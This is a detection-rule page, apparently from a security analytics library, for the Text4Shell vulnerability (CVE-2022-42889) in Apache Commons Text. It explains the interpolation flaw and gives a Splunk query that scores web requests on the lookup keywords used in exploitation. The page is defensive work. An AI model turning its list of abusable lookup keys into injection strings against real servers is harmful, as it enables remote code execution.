LoFP LoFP / false positives are present when the values are set to 1 for utf and lookup. it's possible to raise this to ttp (direct notable) if removal of other_lookups occur and score is raised to 2 (down from 4).

Techniques

Sample rules

Exploit Public Facing Application via Apache Commons Text

Description

The following analytic identifies activity related to Text4Shell, or the critical vulnerability CVE-2022-42889 in Apache Commons Text Library. Apache Commons Text versions 1.5 through 1.9 are affected, but it has been patched in version 1.10. The analytic may need to be tuned for your environment before enabling as a TTP, or direct Notable. Apache Commons Text is a Java library described as a library focused on algorithms working on strings. We can see it as a general-purpose text manipulation toolkit. This vulnerability affects the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to Remote Code Execution. This is due to a logic flaw that makes the script, dns, and url lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups.

Detection logic


| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.http_method IN (POST, GET) by Web.src Web.status Web.uri_path Web.dest Web.http_method Web.uri_query Web.http_user_agent 
| `drop_dm_object_name("Web")` 
| eval utf=if(like(lower(uri_query),"%:utf-8:http%"),2,0) 
| eval lookup = if(like(lower(uri_query), "%url%") OR like(lower(uri_query), "%dns%") OR like(lower(uri_query), "%script%"),2,0) 
| eval other_lookups = if(like(lower(uri_query), "%env%") OR like(lower(uri_query), "%file%") OR like(lower(uri_query), "%getRuntime%") OR like(lower(uri_query), "%java%") OR like(lower(uri_query), "%localhost%") OR like(lower(uri_query), "%properties%") OR like(lower(uri_query), "%resource%") OR like(lower(uri_query), "%sys%") OR like(lower(uri_query), "%xml%") OR like(lower(uri_query), "%base%"),1,0) 
| addtotals fieldname=Score utf lookup other_lookups 
| fields Score, src, dest, status, uri_query, uri_path, http_method, http_user_agent firstTime lastTime 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| where Score >= 4 
| `exploit_public_facing_application_via_apache_commons_text_filter`